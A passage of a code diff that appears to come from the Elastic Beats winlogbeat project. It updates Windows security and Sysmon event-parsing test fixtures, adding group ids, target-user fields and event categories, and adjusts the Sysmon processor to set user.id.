"id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", + "name": "testglobal1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4753.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4753.evtx.golden.json index 401a7005e4c7..df5d283bb3cf 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4753.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4753.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4759.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4759.evtx.golden.json index 1519fe28c2c6..ed306992f890 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4759.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4759.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4760.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4760.evtx.golden.json index 2e2445dd16c3..b3842d0b7c71 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4760.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4760.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4761.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4761.evtx.golden.json index 353394a452ac..3c177519316e 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4761.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4761.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni2" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", + "name": "testuni2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4762.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4762.evtx.golden.json index 688e0f7c5aa5..b31bf25e3f8e 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4762.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4762.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni2" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", + "name": "testuni2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4763.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4763.evtx.golden.json index 431f161b48bc..cb288f808ee4 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4763.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4763.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2905", "name": "testuni2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.evtx.golden.json index f7944a0c686d..8f3d01584d63 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4778.evtx.golden.json @@ -4,7 +4,8 @@ "event": { "action": "session-reconnected", "category": [ - "authentication" + "authentication", + "session" ], "code": 4778, "kind": "event", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.evtx.golden.json index 93f89a592a6d..0c8fb8171a06 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2012_4779.evtx.golden.json @@ -4,7 +4,8 @@ "event": { "action": "session-disconnected", "category": [ - "authentication" + "authentication", + "session" ], "code": 4779, "kind": "event", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.evtx.golden.json index c849ac7c402f..cdd1450d86c4 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1110", "name": "DnsUpdateProxy" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.evtx.golden.json index 489ea32ae304..c7e1105ac1cf 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", + "name": "test_group2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.evtx.golden.json index 971694737da8..c9bf1f239694 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2v2" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", + "name": "test_group2v2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.evtx.golden.json index e538fa47a1a7..0c22e3a226d4 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.evtx.golden.json index a7021cfd3a2c..dfd76b52414f 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.evtx.golden.json index 5cdec92fafb7..3768dc8e845b 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", + "name": "test_group1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.evtx.golden.json index bf4540b62cb3..43dafddae907 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", + "name": "test_group1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.evtx.golden.json index e47e1e32ccaf..24089b7f65cc 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1v1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.evtx.golden.json index dc4d99b087ed..37c7ec70a687 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1111", "name": "test_group1v1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.evtx.golden.json index 7827d002a2cb..0eb1d5a9b482 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.evtx.golden.json index 2389eb533ea2..63dd5670366d 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.evtx.golden.json index 83035c20d465..22a5fd75508c 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4755.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.evtx.golden.json index d4ec0369bf8d..3402221270b1 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4756.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3v2" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", + "name": "Test_group3v2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.evtx.golden.json index d54323688b8c..765601106302 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4757.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3v2" }, "host": { @@ -32,7 +33,15 @@ "user": { "domain": "WLBEAT", "id": "S-1-5-21-101361758-2486510592-3018839910-500", - "name": "Administrator" + "name": "Administrator", + "target": { + "group": { + "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", + "name": "Test_group3v2" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.evtx.golden.json index 685292a5c0d5..54dd5ddcf7eb 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4758.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1113", "name": "Test_group3v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.evtx.golden.json index 17ca0872e471..ff37d5288886 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4764.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "WLBEAT", + "id": "S-1-5-21-101361758-2486510592-3018839910-1112", "name": "test_group2v2" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.evtx.golden.json index bbac172350c0..caca7eca7f2e 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "Builtin", + "id": "S-1-5-32-544", "name": "Administrators" }, "host": { diff --git a/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js b/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js index 17f1d0a914fc..372912027a5b 100644 --- a/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js +++ b/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js @@ -330,13 +330,16 @@ var sysmon = (function () { }; var addUser = function (evt) { + var id = evt.Get("winlog.user.identifier"); + if (id) { + evt.Put("user.id", id); + } var userParts = evt.Get("winlog.event_data.User"); if (!userParts) { return; } userParts = userParts.split("\\"); if (userParts.length === 2) { - evt.Delete("user"); evt.Put("user.domain", userParts[0]); evt.Put("user.name", userParts[1]); evt.AppendTo("related.user", userParts[1]); @@ -1192,7 +1195,7 @@ var sysmon = (function () { .Add(parseUtcTime) .AddFields({ fields: { - category: ["configuration"], + category: ["configuration", "registry"], type: ["change"], }, target: "event", @@ -1231,7 +1234,7 @@ var sysmon = (function () { .Add(parseUtcTime) .AddFields({ fields: { - category: ["configuration"], + category: ["configuration", "registry"], type: ["change"], }, target: "event", @@ -1270,7 +1273,7 @@ var sysmon = (function () { .Add(parseUtcTime) .AddFields({ fields: { - category: ["configuration"], + category: ["configuration", "registry"], type: ["change"], }, target: "event", diff --git a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-filedelete.evtx.golden.json b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-filedelete.evtx.golden.json index d5d5c494791a..5f333e3aee22 100644 --- a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-filedelete.evtx.golden.json +++ b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-filedelete.evtx.golden.json @@ -55,6 +55,7 @@ }, "user": { "domain": "VAGRANT-2012-R2", + "id": "S-1-5-18", "name": "vagrant" }, "winlog": { @@ -127,6 +128,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "LOCAL SERVICE" }, "winlog": { @@ -198,6 +200,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { diff --git a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-registry.evtx.golden.json b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-registry.evtx.golden.json index 5dcbcaab9428..5da24c16db5c 100644 --- a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-registry.evtx.golden.json +++ b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-11-registry.evtx.golden.json @@ -3,7 +3,8 @@ "@timestamp": "2020-05-05T14:57:40.589Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", @@ -67,7 +68,8 @@ "@timestamp": "2020-05-05T14:57:44.714Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", @@ -125,7 +127,8 @@ "@timestamp": "2020-05-05T14:57:44.714Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", @@ -189,7 +192,8 @@ "@timestamp": "2020-05-05T14:57:46.808Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", @@ -247,7 +251,8 @@ "@timestamp": "2020-05-05T14:57:46.808Z", "event": { "category": [ - "configuration" + "configuration", + "registry" ], "code": 13, "kind": "event", diff --git a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-12-processcreate.evtx.golden.json b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-12-processcreate.evtx.golden.json index 7b1027046851..678f5fe9fdf0 100644 --- a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-12-processcreate.evtx.golden.json +++ b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-12-processcreate.evtx.golden.json @@ -57,6 +57,7 @@ }, "user": { "domain": "VAGRANT", + "id": "S-1-5-18", "name": "vagrant" }, "winlog": { diff --git a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-9.01.evtx.golden.json b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-9.01.evtx.golden.json index 71e0fcc639de..82df773ae157 100644 --- a/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-9.01.evtx.golden.json +++ b/x-pack/winlogbeat/module/sysmon/test/testdata/sysmon-9.01.evtx.golden.json @@ -144,6 +144,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -236,6 +237,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -422,6 +424,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -506,6 +509,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -581,6 +585,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -656,6 +661,7 @@ }, "user": { "domain": "VAGRANT-2012-R2", + "id": "S-1-5-18", "name": "vagrant" }, "winlog": { @@ -731,6 +737,7 @@ }, "user": { "domain": "VAGRANT-2012-R2", + "id": "S-1-5-18", "name": "vagrant" }, "winlog": { @@ -806,6 +813,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -884,6 +892,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -962,6 +971,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -1036,6 +1046,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -1110,6 +1121,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1187,6 +1199,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1264,6 +1277,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -1338,6 +1352,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "NETWORK SERVICE" }, "winlog": { @@ -1413,6 +1428,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1491,6 +1507,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1569,6 +1586,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": { @@ -1647,6 +1665,7 @@ }, "user": { "domain": "NT AUTHORITY", + "id": "S-1-5-18", "name": "SYSTEM" }, "winlog": {